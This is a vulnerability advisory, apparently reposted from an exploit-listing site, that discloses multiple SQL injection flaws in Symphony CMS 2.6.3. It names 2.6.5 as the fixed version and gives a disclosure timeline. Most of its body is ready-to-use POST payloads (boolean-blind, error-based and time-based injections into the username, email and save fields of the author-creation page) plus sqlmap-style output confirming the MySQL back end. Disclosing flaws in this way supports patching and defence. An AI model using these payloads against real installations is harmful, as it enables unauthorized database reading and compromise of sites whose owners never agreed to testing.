Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities

2016-02-04 19:05:27

================================================================
Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities
================================================================

Information
================================================================
Vulnerability Type : Multiple SQL Injection Vulnerabilities
Vendor Homepage: http://www.getsymphony.com/
Vulnerable Version:Symphony CMS 2.6.3
Fixed Version :Symphony CMS 2.6.5
Severity: High
Author – Sachin Wagh (@tiger_tigerboy)

Description
================================================================

The vulnerability is located in the 'fields[username]','action[save]' and
'fields[email]' of the '/symphony/system/authors/new/' page.

Proof of Concept
================================================================
*1. fields[username] (POST)*

Parameter: fields[username] (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697'
OR 7462=7462#&fields[user_type]=author&fields[password]=sach
in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author

Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105'
OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1
004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a
rea]=3&action[save]=Create Author

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123'
OR SLEEP(5)#&fields[user_type]=author&fields[password]=s
achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
---
[14:09:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0.12

*2. fields[email] (POST)*

Parameter: fields[email] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
[email protected]' AND 4852=4852 AND
'dqXl'='dqXl&fields[username]=sachinnn123&fields[user
type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
[email protected]' AND (SELECT 8298 FROM(SELECT
COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(
298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'Pmvq'='Pmvq&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[
assword-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
[email protected]' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND
'hKvH'='hKvH&fields[user
ame]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author

*3. action[save] (POST)*

Parameter: action[save] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
[email protected]
&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sa
chin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author%' AND 8836=8836 AND '%'='

---
[12:23:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0
================================================================
Vulnerable Product:
[+]
Symphony CMS 2.6.3

Vulnerable Parameter(s):

[+]fields[username] (POST)
[+]fields[email] (POST)
[+]action[save] (POST)

Affected Area(s):
[+]
http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/

================================================================
Disclosure Timeline:

Vendor notification: Jan 29, 2016
Public disclosure: Jan 30, 2016
Credits & Authors
================================================================
Sachin Wagh (@tiger_tigerboy)


-- Best Regards, *Sachin Wagh*

Fixes

No fixes

In order to submit a new fix you need to be registered.